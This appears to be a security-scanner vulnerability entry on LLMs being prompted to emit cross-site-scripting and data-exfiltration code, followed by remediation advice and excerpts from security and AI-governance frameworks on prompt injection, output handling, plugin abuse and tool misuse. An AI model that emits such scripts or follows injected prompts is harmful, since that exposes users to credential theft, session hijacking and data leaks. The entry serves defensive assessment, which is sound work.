XSS Attack Vulnerability

Updated: May 5, 2026

Description

Severity: High

The model can be made to include exfiltration code in its output, potentially leading to Cross-Site Scripting (XSS) attacks.

This vulnerability arises when the model generates output that includes malicious scripts or code, which could then be executed in the context of a user's browser. Attackers may exploit this flaw by crafting prompts that cause the model to output harmful code, which could be used for data exfiltration, website defacement, or the spreading of malware.

Example Attack

If exploited, this vulnerability could result in serious security breaches, including unauthorized access to sensitive data, session hijacking, or the injection of malicious scripts into trusted environments. The model's output could be manipulated to perform actions like stealing credentials, redirecting users to malicious sites, or executing harmful scripts. These attacks could undermine user trust, compromise website security, and expose organizations to significant reputational and financial risks.

Remediation

Investigate and improve the effectiveness of guardrails and other output security mechanisms to prevent the model from generating code that could be executed maliciously. Strengthen the model's ability to filter and sanitize output, especially when responding to prompts that could trigger the inclusion of executable or exfiltrative code. Implement rigorous security validation on all generated content to ensure that it is free from harmful scripts or code.

Security Frameworks

A Prompt Injection Vulnerability occurs when user prompts alter the LLM's behavior or output in unintended ways. These inputs can affect the model even if they are imperceptible to humans, therefore prompt injections do not need to be human-visible/readable, as long as the content is parsed by the model.

Sensitive information can affect both the LLM and its application context. This includes personal identifiable information (PII), financial details, health records, confidential business data, security credentials, and legal documents. Proprietary models may also have unique training methods and source code considered sensitive, especially in closed or foundation models.

Improper Output Handling refers specifically to insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to providing users indirect access to additional functionality.

Adversaries can Craft Adversarial Data that prevent a machine learning model from correctly identifying the contents of the data. This technique can be used to evade a downstream task where machine learning is utilized. The adversary may evade machine learning based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins. LLMs are often connected to other services or resources via plugins to increase their capabilities. Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.

Adversaries may craft prompts that induce the LLM to leak sensitive information. This can include private user data or proprietary information. The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.

AI system is evaluated regularly for safety risks - as identified in the MAP function. The AI system to be deployed is demonstrated to be safe, its residual negative risk does not exceed the risk tolerance, and can fail safely, particularly if made to operate beyond its knowledge limits. Safety metrics implicate system reliability and robustness, real-time monitoring, and response times for AI system failures.

AI system security and resilience - as identified in the MAP function - are evaluated and documented.

Post-deployment AI system monitoring plans are implemented, including mechanisms for capturing and evaluating input from users and other relevant AI actors, appeal and override, decommissioning, incident response, recovery, and change management.

The organization shall define and document verification and validation measures for the AI system and specify criteria for their use.

The organization shall define and document the necessary elements for the ongoing operation of the AI system. At the minimum, this should include system and performance monitoring, repairs, updates and support.

The organization shall assess and document the potential impacts of AI systems to individuals or groups of individuals throughout the system's life cycle.

The organization shall determine and document a plan for communicating incidents to users of the AI system.

Attackers exploit code-generation features or embedded tool access to escalate actions into remote code execution (RCE), local misuse, or exploitation of internal systems.

Agents can misuse legitimate tools due to prompt injection, misalignment, or unsafe delegation - leading to data exfiltration, tool output manipulation or workflow hijacking.